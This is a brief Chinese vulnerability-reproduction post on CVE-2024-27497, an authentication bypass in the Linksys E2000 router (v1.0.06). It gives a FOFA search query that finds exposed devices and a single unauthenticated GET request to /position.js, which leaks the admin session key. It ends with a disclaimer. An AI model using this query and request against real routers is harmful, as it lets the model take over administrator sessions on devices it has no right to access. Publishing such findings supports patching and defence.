【漏洞复现】Linksys E2000 position.js 身份验证绕过漏洞(CVE-2024-27497)

0x01 产品简介

Linksys E2000是一款由思科（Cisco）品牌推出的无线路由器，它是一款支持2.4GHz和5GHz双频段的无线路由器，用户可以避开拥挤的2.4GHz频段，独自享受5GHz频段的高速无线生活。

0x02 漏洞概述

Linksys E2000 v1.0.06 存在身份验证绕过漏洞，未授权的攻击者可以通过该漏洞获取管理员的当前会话，从而绕过身份验证。

0x03 测绘语句

FOFA：app="LINKSYS-E2000"

0x04 漏洞复现

GET /position.js HTTP/1.1

如访问 /position.js路由存在 session_key和close_session字段，则证明存在此漏洞。

0x05 影响范围

Linksys E2000 v1.0.06

0x06 免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。